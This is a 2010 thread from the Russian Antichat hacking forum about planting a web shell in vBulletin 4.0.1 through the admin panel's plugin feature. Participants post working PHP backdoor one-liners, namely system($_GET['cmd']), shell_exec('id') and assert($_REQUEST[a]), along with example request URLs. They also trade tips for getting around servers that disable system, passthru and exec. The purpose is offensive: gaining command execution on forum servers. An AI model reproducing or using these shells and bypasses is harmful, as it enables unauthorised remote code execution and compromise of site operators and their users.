Форум АНТИЧАТ - шелл в vBulletin 4.0.1

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - шелл в vBulletin 4.0.1 (https://forum.antichat.xyz/showthread.php?t=176138)

$ereg@

04.02.2010 15:30

шелл в vBulletin 4.0.1

создал свой плюгин
Plugins & Products ->Add New Plugin->faq_complete
с содержимым: system($_GET["cmd"]);
делаю плюгин активным...
делаю запрос:admincp/faq.php?cmd=ls
и тупо никакой реакции :(
в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?

Pashkela

04.02.2010 15:39

system может быть в дизабл функшионс, сначала посмотри phpinfo

Bb0y	04.02.2010 15:43

eval попробуй заюзать

DimOnOID

04.02.2010 15:49

Цитата:

Сообщение от $ereg@

faq.php находится в корне форума..а не в админке.

$ereg@

04.02.2010 16:17

гыгы))) реально) фига я тупанул) спасибо большое тебе) а то так бы и тупил)

greenly

08.02.2010 12:09

что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons " :rolleyes:

+StArT+

09.02.2010 02:49

Цитата:

Сообщение от greenly

что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons " :rolleyes:

Воспользоваться альтернативой если такая имеется.. :)
К примеру: shell_exec

PHP код:


		
			
<? echo(shell_exec('id')); ?>

Либо обходится средствами php.

greenly

09.02.2010 17:52

shell_exec, eval тоже в запрете.
будем курить php :(

Pashkela

09.02.2010 18:18

<?assert($_REQUEST[a]);?>

http://site/script.php?a=phpinfo();

и еще куча вариантов

Serafim

28.03.2010 10:47

А вот на счет 4.0.2 + права модера?

Реально ли?

Время: 23:25